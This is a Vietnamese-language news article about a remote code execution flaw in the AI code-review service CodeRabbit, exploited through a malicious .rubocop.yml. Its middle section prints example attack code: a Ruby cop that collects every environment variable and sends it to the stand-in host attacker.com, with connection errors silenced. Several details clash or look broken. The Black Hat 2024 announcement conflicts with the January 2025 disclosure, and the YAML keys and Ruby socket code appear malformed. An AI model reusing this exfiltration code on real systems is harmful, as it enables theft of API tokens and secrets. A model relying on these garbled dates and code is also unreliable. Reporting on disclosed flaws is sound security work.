Một lỗ hổng remote code execution (RCE) nghiêm trọng đã được phát hiện trong CodeRabbit, một trong những công cụ đánh giá mã nguồn được hỗ trợ bởi AI phổ biến nhất của GitHub. Lỗ hổng này có thể cho phép kẻ tấn công giành quyền truy cập đọc và ghi vào hơn một triệu kho mã nguồn, bao gồm cả những kho riêng tư. Phát hiện này được công bố bởi các nhà nghiên cứu bảo mật từ Kudelski Security tại Black Hat USA 2024.

Phân tích Kỹ thuật Lỗ hổng Remote Code Execution trong CodeRabbit

Lỗ hổng bảo mật này cho phép kẻ tấn công thực thi mã từ xa trên các máy chủ sản xuất của CodeRabbit. Điều này dẫn đến việc rò rỉ các API token và thông tin bí mật. Ngoài ra, nó còn tiềm ẩn nguy cơ truy cập vào cơ sở dữ liệu PostgreSQL của công ty. Kẻ tấn công có thể giành quyền truy cập trái phép vào cả kho mã nguồn công khai và riêng tư.

CodeRabbit là một nền tảng đánh giá mã nguồn dựa trên AI với thị phần đáng kể. Nền tảng này hiện đang quản lý hơn một triệu kho mã nguồn và phân tích năm triệu pull request. CodeRabbit giữ vị trí ứng dụng hỗ trợ AI được cài đặt nhiều nhất trên GitHub Marketplace và nằm trong số các ứng dụng được cài đặt hàng đầu trên tất cả các danh mục.

Nền tảng này tự động phân tích các thay đổi mã trong pull request và cung cấp các đánh giá do AI tạo ra. Điều này làm cho nó trở thành một công cụ năng suất phát triển có giá trị. Các tính năng bao gồm tóm tắt PR, xác định các vấn đề bảo mật và đề xuất cải thiện mã.

Cơ chế Khai thác Lỗ hổng Remote Code Execution

Lỗ hổng này khai thác sự tích hợp của CodeRabbit với các công cụ phân tích tĩnh bên ngoài, đặc biệt nhắm mục tiêu vào Rubocop, một trình phân tích tĩnh Ruby.

Các nhà nghiên cứu phát hiện rằng CodeRabbit sẽ tự động thực thi các công cụ này trên các pull request chứa các loại tệp liên quan. Rubocop được cấu hình để chạy trên các tệp Ruby khi một tệp cấu hình .rubocop.yml có mặt trong kho lưu trữ.

Vector tấn công liên quan đến việc tạo một pull request độc hại chứa một tệp .rubocop.yml được tạo sẵn. Tệp này hướng dẫn Rubocop tải một tệp mở rộng Ruby độc hại.

Tệp mở rộng này có khả năng thực thi mã tùy ý, bao gồm các lệnh để lấy cắp các biến môi trường chứa API token và thông tin bí mật nhạy cảm. Dữ liệu này sau đó sẽ được gửi đến các máy chủ do kẻ tấn công kiểm soát.

Quy trình khai thác yêu cầu nỗ lực tối thiểu. Kẻ tấn công chỉ cần có quyền truy cập CodeRabbit, tạo một kho lưu trữ với các tệp cấu hình độc hại. Sau đó, họ chỉ cần chờ quy trình đánh giá mã tự động thực thi payload của mình.

# Ví dụ nội dung tệp .rubocop.yml độc hại
AllCops:
  Exclude:
    - "**/*"
  Require:
    - "./path/to/malicious_extension.rb"

# Ví dụ nội dung tệp malicious_extension.rb
require 'socket'

module RuboCop
  module Cop
    module MyNamespace
      class MaliciousExtension < Cop
        def on_new_investigation
          # Exfiltrate environment variables
          env_vars = ENV.to_a.map { |k, v| "#{k}=#{v}" }.join("n")
          
          begin
            TCPSocket.new('attacker.com', 8080) do |s|
              s.puts env_vars
            end
          rescue => e
            # Handle connection errors silently
          end
        end
      end
    end
  end
end

Để biết thêm chi tiết kỹ thuật về cách khai thác, độc giả có thể tham khảo báo cáo gốc của Kudelski Security tại How We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories.

Tác động và Phạm vi Ảnh hưởng

Khả năng remote code execution này có thể dẫn đến việc kiểm soát hoàn toàn các máy chủ sản xuất của CodeRabbit. Hậu quả trực tiếp là khả năng truy cập không hạn chế vào dữ liệu người dùng. Các API token và thông tin bí mật bị rò rỉ có thể được sử dụng để truy cập trái phép vào các dịch vụ khác.

• Quyền truy cập kho mã nguồn: Kẻ tấn công có thể đọc, sửa đổi hoặc xóa mã nguồn từ hơn một triệu kho lưu trữ, bao gồm cả những kho riêng tư.
• Rò rỉ dữ liệu nhạy cảm: Các API token và thông tin bí mật của CodeRabbit có nguy cơ bị đánh cắp.
• Truy cập cơ sở dữ liệu: Tiềm năng truy cập vào cơ sở dữ liệu PostgreSQL của công ty, chứa thông tin cấu hình và dữ liệu khách hàng.

Phạm vi ảnh hưởng của lỗ hổng này rất rộng. CodeRabbit là một công cụ tích hợp sâu vào quy trình phát triển của nhiều tổ chức. Do đó, một cuộc tấn công thành công có thể dẫn đến một cuộc tấn công chuỗi cung ứng phần mềm trên quy mô lớn.

Phản ứng và Biện pháp Khắc phục của CodeRabbit

CodeRabbit đã thể hiện khả năng phản ứng sự cố mẫu mực sau khi lỗ hổng được tiết lộ vào tháng 1 năm 2025.

Trong vòng vài giờ kể từ khi nhận được thông báo, công ty đã thực hiện các biện pháp sau:

• Vô hiệu hóa chức năng Rubocop để ngăn chặn khai thác thêm.
• Xoay vòng tất cả các thông tin xác thực và bí mật có khả năng bị xâm phạm.
• Triển khai một bản vá vĩnh viễn, di chuyển các hoạt động của Rubocop vào môi trường sandbox bảo mật của họ.

Sau đó, CodeRabbit đã tiến hành một cuộc kiểm toán bảo mật toàn diện. Họ triển khai các cơ chế thực thi sandbox tự động và thiết lập các cổng triển khai được tăng cường. Những biện pháp này nhằm ngăn chặn các lỗ hổng tương tự trong tương lai. Công ty cũng đã công khai tài liệu về phản ứng và nỗ lực khắc phục của họ. Điều này thể hiện sự minh bạch trong các thực hành bảo mật của CodeRabbit.

Bài học và Khuyến nghị về An ninh mạng

Sự cố này làm nổi bật những thách thức bảo mật cố hữu trong các công cụ phát triển được hỗ trợ bởi AI. Đặc biệt là những công cụ tích hợp với nhiều hệ thống bên ngoài. Đây là một ví dụ rõ ràng về một lỗ hổng nghiêm trọng có thể gây ra hậu quả lớn.

Lỗ hổng này nhấn mạnh tầm quan trọng của việc sandboxing các công cụ của bên thứ ba khi thực thi mã. Đồng thời, cần triển khai các kiểm soát bảo mật mạnh mẽ xung quanh các nền tảng phân tích mã tự động xử lý dữ liệu kho lưu trữ nhạy cảm.

Các tổ chức cần ưu tiên kiểm tra bảo mật nghiêm ngặt. Việc này bao gồm cả kiểm tra các tích hợp bên ngoài trong hệ thống phát triển của họ. Thực hành này sẽ giúp giảm thiểu rủi ro từ các lỗ hổng remote code execution tiềm ẩn.